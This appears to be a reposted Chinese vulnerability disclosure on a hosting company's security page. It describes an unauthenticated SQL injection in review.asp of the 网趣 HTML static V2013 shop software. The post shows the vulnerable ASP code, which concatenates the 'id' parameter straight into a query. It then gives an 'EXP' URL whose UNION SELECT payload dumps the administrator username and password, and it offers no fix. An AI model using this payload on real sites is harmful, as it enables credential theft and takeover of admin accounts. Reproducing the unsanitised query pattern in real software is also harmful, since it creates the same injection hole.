鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

网趣HTML静态V2013版注入 可爆管理员帐号密码

来源:互联网 作者:佚名 时间:2015-06-30 08:19
网趣HTML静态 V2013版 某页面依旧存在注入可爆管理员帐号密码! review.asp页面未对参数过滤,并且未能像v13版的一样验证权限,导致可直接被注入。 %dim bookid,action //定义变量pinglunid=request.QueryString(id) //接收变量并赋值action=request.QueryStr
网趣HTML静态 V2013版 某页面依旧存在注入可爆管理员帐号密码!
 
review.asp页面未对参数过滤,并且未能像v13版的一样验证权限,导致可直接被注入。
<%dim bookid,action //定义变量

pinglunid=request.QueryString("id") //接收变量并赋值

action=request.QueryString("action") //接收变量并赋值

if action="save" then  //如果变量action=save就执行下面的SQL语句

set rs=server.CreateObject("adodb.recordset")

rs.open "select * from review where pinglunid="&pinglunid,conn,1,3 //执行SQL

rs("huifu")=HTMLEncode2(trim(request("huifu")))

rs("huifudate")=now()

rs.update

rs.close

set rs=nothing

response.write "<script language=javascript>alert('您的回复已成功提交!!');history.go(-1);</script>"

response.End

end if

%>

 

 
EXP:
 
http://127.0.0.1/2013/admin/review.asp?id=1%20union%20select%201,2,3,4,5,admin,7,8,9,password,11%20%20from%20admin
网友评论
<